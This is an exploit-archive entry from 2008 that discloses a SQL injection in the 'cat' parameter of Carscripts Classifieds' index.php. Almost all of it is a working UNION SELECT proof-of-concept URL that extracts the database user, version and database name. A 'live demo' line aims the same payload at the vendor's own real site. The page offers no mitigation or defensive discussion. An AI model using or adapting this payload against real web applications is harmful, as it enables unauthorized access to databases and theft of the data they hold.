Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability
# Published : 2008-06-18
# Author : Stack
# Previous Title : nweb2fax <= 0.2.7 Multiple Remote Vulnerabilities
# Next Title : BoatScripts Classifieds (index.php type) SQL Injection Vulnerability

Carscripts Classifieds Sql INjection

By Stack
Home v4-team.com
###########################################
[+] : you can see the Result in 'Title'
[+] : Open the source page to see the result
###########################################
poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

live demo
http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*

# www.Syue.com [2008-06-18]